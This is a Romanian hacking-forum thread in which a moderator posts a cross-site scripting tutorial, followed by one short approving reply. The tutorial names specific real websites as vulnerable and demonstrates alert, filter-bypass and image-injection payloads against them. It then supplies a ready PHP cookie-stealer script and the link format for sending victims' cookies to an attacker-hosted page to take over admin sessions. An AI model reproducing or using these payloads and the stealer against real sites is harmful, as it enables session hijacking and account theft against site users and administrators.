EliteHackers
SALUT 2022!! NE-AM MUTAT PE DISCORD ! Vrei să inviți un prieten? [T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r Acesta aste link-ul oficial al acestui server.
Lista Forumurilor Pe Tematici
EliteHackers | Reguli | Inregistrare | Login

POZE ELITEHACKERS

Nu sunteti logat.
Nou pe simpatie:
lovely_pink pe Simpatie.ro
Femeie
25 ani
Bucuresti
cauta Barbat
25 - 48 ani
EliteHackers / Windows - Hacking & Tools / [new]Despre XSS(update) Moderat de Ad_Infinitum, AntiKiler, Puscas_marin, kooze, r3v
Autor
Mesaj Pagini: 1
Puscas_marin
Moderator

Inregistrat: acum 17 ani
Postari: 315
Datoriata exprimarii anevoioase si datelor incomplete m-am gandit sa refac vechiul tutorial "DESPRE XSS @2006-2007"


[center][size=100]
-------------------------------
AUTOR:Puscas_marin
-------------------------------
[/size][/center]


1.Ce este Xss? si la ce foloste?
R1. Xss([color=blue]Cross-site scripting) a aprut pentru prima data in 1996 si de obicei este este legata de cookieuri si message boxuri.XSS este o vulnerabilitate pe un server, ce permite introducerea unui script pe pagina HTML de pe un server[/color]
R2. Im prima faza am putea zice ca nu foloste la nimic un textbox inserat in  script, dar daca stam sa ne gandim si sa avansam putin in Xss vedem ca are legatura cu "prajiturelele"(cookie), deci dupa cum stiti cookie este un text care pleaca din browserul tau inspre site si se intoarce inapoi neschimbat, daca reusim sa furam cookie-ul de la un admin avem pe acel site aces la admin panel, o putem folosi la redirectionare inserarea unor poze etc.
2.De ce apre Xss si unde apare?
R. Xss apre din cauza filtrari proaste a codului sau in multe cazuri nu se filtreaza chiar deloc.

[color=Aquamarine]OK dupa mica introducere care este si in celalat tutorial o sa trec direct la exmple clare:

[center]ALERT[/center]
1.O sa luam un site pe care sa il testam daca este vulnerabil la XSS www.seriall.com
Pentru testarea vulnerabilitati  xss majoriattea atacatorilor se folosesc de

Code:

<script>alert("xss")</script>

sau

Code:

"><script>alert("xss")</script> --> acesta este folosit in cazul in care "input" nu este inchis

Pentru a testa daca acest site exte vulnerabil la "Cross-site scripting" vom incerca sa injectam un mesaj de alerta "alert('xss')" , cum o sa injectam acest mesaj? care sa apara utilizatorului? o sa folosim <script> </script>
Ok acum o sa verificam daca se filtreaza  "  < > /  '  ".

O sa folosim search deoarece este de obicei cel mai vulnerabil ok sa introducem in

Code:

TextBox:xxxxx< / >xxxxx

--> acum click pe Search si sa ne uitam in sursa paginii --> Source

Code:

<input name="s" type="text" size="20" maxlength="80" value="xxxxx< / >xxxxx">

BINGO NU SE FILTREAZA :d ok sa inseram "alertul"

Code:

<script>alert(/Puscas_marin test xss</script>

Fiindca Site-ul ales de noi foloseste metoda "GET" pentru a prelua datele de la utilizator, se poate foarte usor sa modificam din browser URL-u;
Url-ul modificat din browser:http://www.seriall.com/?s=<script>alert(/Puscas_marin test xss</script>

ScreenShot



2. Haideti sa incercam inca pe un site metoda de mai sus Crackfind.com
Deci o sa incercam direct sa inseram

Code:

<script>alert('Puscas_marin test xss')</script>

Ok cred ca deja ati observat ca acest site primeste datele prin metoda "POST" nemodifican URL in rest e la fel ca si la celatat exemplu nu se filtreaza deloc codul
ScreenShot



3.Haideti sa Vedem daca mai reusim inca pe un site de exmplu http://pnl.ro ( sunt apolitic pur si simplu cautam ceva si am vazut ca e vulnerabil)

Code:

http://pnl.ro/?id=search

acum haideti sa inseram <script>alert("Puscas_marin test xss"</script>
hmmmmm................. nu merge
ScreenShoot


Ia sa vedem ce zice sursa paginii

Code:

<INPUT type="text" size="30" class="LargeInput" name="expr" value="<script>alert(\"Puscas_marin test xss\")</script>

Hmmmm  caracterul " sa transformat in \" ----> atunci o sa folosim \ in loc de " ok hai sa vedem
deci o sa introducem acest cod

Code:

<script>alert(\Puscas_marin test xss\)</script>

in loc de

Code:

<script>alert("Puscas_marin test xss")</script>

Hm dar tot nu merge haideti sa ne uitam iar in sursa paginii :P

Code:

<INPUT type="text" size="30" class="LargeInput" name="expr" value="<script>alert(/Puscas_marin test xss/)</script>" style="width:200">

Hm haideti sa inchidem input prin "> astfel

Code:

<script>alert(/xss/)</script>

nu va mai fi luat ca "value" deoarece aceasta este inchisa prin "> value = " "> iar <script>alert(\Puscas_marin test xss\)</script> este luat ca text si executat de browser
ok deci codul nostru va arata astfel

Code:

"><script>alert(\Puscas_marin test xss\)</script><

Acum input-ul din sursa pagini va arta astfel :d

Code:

<INPUT type="text" size="30" class="LargeInput" name="expr" value=" "><script>alert(/Puscas_marin test xss/)</script>

deci acum avem "alert-ul"

PSaca caracterul " este transformat in \" se poate folosi si Javascript caracter code

Code:

"><script>alert(String.fromCharCode(80,85,83,67,65,83))</script>

Toate caracterele necesare le gasiti Aici

VOILA!!!!!
[color=red]ScreenShoot 1


ScreenShoot 2


4. Sper sa gasesc si alte site-uri in care se flitreaza partial codul ca sa va arat, dar pana atunci o sa mia dureze caci momentan nu am timp.


Alte coduri care o sa va fie necesare

Code:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83) )>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
</textarea><script>alert(/xss/)</script>
</title><script>alert(/xss/)</script>

[center]INSERAREA UNEI IMAGINI[/center]

1.seriall.com acesta este primul exemplu de inserarea a unei imagini

Code:

<img src="imagine.gif/jpg/png/etc."

Acesta este codul pentru "introducerea" unei imagini in site-ul vulenrabil la XSS.
imaginea noastra estehttp://img519.imageshack.us/img519/8404/opozanl3.png
Ok deci codul care vrem sa il injectam noi va arata astfel

Code:

<img src="http://img519.imageshack.us/img519/8404/opozanl3.png">

iar daca dorim sa ii punem si text de exemplu "Puscas" va arata astfel

Code:

<img src="http://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas">

ScreenShoot 1

ScreenShoot 2


2.Sa incercam aceeasi treaba si pe crackfind.com
Deci codul nostru va fi acesta:

Code:

<img src="http://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas">

!!!.........hm ca si la exemplu de mai sus cu alert nu merge.....sa ne uitam prin sursa paginii.....

Code:

input size=30 name=chto value="<img src="hhttp://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas">">

asa arata "input-ul" cred ca ati observat ca se dubleaza "> la inchidere deci hadeti sa scapam de el :d, tot ce trebuie sa facem este sa renuntam in codul nostru la "> deoarece el deja exista :d
Noul nostru cod:"><img src="http://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas[/b] --> va fi acesta haideti sa incercam de ce am pus inaite si "> ? ca sa inchid input altfel nu va merge :P

Iata!!!
ScreenShoot


[center]Cookies[/center]
******Acest sub punc se va inparti in 2 categorii:******
*****************I.Aflarea cookie***************
*****************II.Furtul   cookie***************
I)
1.seriall.com
Ce este un cookie?
Cookie-urile reprezinta un mecanism standard care permite ca un
server (site) Web sa trimita anumite informatii pe calculatorul unui
client (utilizator), prin intermediul browserului, sa ceara clientului sa
stocheze aceste informatii pentru ca, ulterior, in diferite circumstante,
navigatorul sa returneze informatiile spre serverul curent


Dar ca sa intelegeti mai usor puteti vedea un cookie ca un sir de caractere care stoicheaza datele acesarii dumneavoastra catre un anumit server pentru a putea fi folosite la urmatoarea cerere

Codul care o sa il injectam noi pentru a putea vedea cookie-ul personal este acesta<script>alert(document.cookie)</script>

Linck-ul nostru va arta astfel:

Code:

http://www.seriall.com/?s=<script>alert(document.cookie)</script>

ScreenShoot


De ce apare un mesaj de alaerta fara nici un text? deoarece noi nu am trimis nimic despre noi care acel server, dar sa vedem in exemplul urmator.

2.http://cookies.forumz.ro
Unde apare xssla semnalare abuz chiar aici http://cookies.forumz.ro/report_abuse.forum?page=
Ok haide-ti sa injectam cod pentru alerta cookie :d

Code:

http://cookies.forumz.ro/report_abuse.forum?page=</script>alert(document.cookie)</script>

ScreenShoot


II)

Ok deci haideti sa trecem la cookie stealer.... deci os a va arat pe exemplul de mai sus cum vine....
Ok avem nevoie de un cookie stealer...necesita cunostinte minime de php... o sa va ofer eu unul simplu gata facut

Code:

<?php
    $cookie = $HTTP_GET_VARS["cookie"];
    $name = $HTTP_GET_VARS["name"];
    $file = fopen('cookielog.txt', 'a');
    if(!empty($cookie) && !empty($name))
        fwrite($file, "Cookie=" . $cookie . chr(13) . chr(10) . "Name=" . $name . chr(13) . chr(10) . chr(13) . chr(10));
?>

Acum acest codul il salvam ca nume.php si mai creeam un document cu numele cookielog.txt. Le uploadam abmele pe un host personal(ex :hostmax.us)  la fiserul .txt o sa ii dam permisiune 777.

Haideti sa va arat cum formati link-ul

Code:

http://cookies.forumz.ro/report_abuse.forum?page= AICI VA VENI STEALERUL VOSTRU

Stealerul vostru fiind acesta [b]http://domeniu/nume.php?cookie='+escape(document.cookie)[b]

o simpla metoda de a va putea pune cookie este aceasta:

1.<script>Link-ul vostru </script>
sau
2<a href="javascript:document.location=''linck-ul vostru"> Faceţi clic aici! </ a>               

Atentie:// Datoriata modificarii caracterului " in \" nu se poate fura cookie-ul respectiv ...... o sa gasesc un alt exemplu pe parcurs si o sa va prezint sau poate veniti voi cu o propunere.

Redirectarii

Code:

windows.location="site redirect"

Momentan aici se termina tutorialul..... este facut in pe fuga ma refe la ultima parte ceea ce priveste cookie dar promit ca o sa il refac pe parcurs

Va rog semanlati toate greselile de scriere.....si nu faceti amre tam-tam cu ele nu am timp sa il recorectez .....

Va rog Veniti cu idei noi....unde va incurcati spuneti si o sa explic iarasi, stiu ca am o exprimare destul de anevoioasa


_______________________________________
Deci asa se fac banii....da clik sa vezi

pus acum 16 ani
   
Hezekiah
EliteHackers Member

Inregistrat: acum 15 ani
Postari: 14
Mortalllllllll bravo frate tineo tot asha   

pus acum 15 ani
   
Pagini: 1  

Mergi la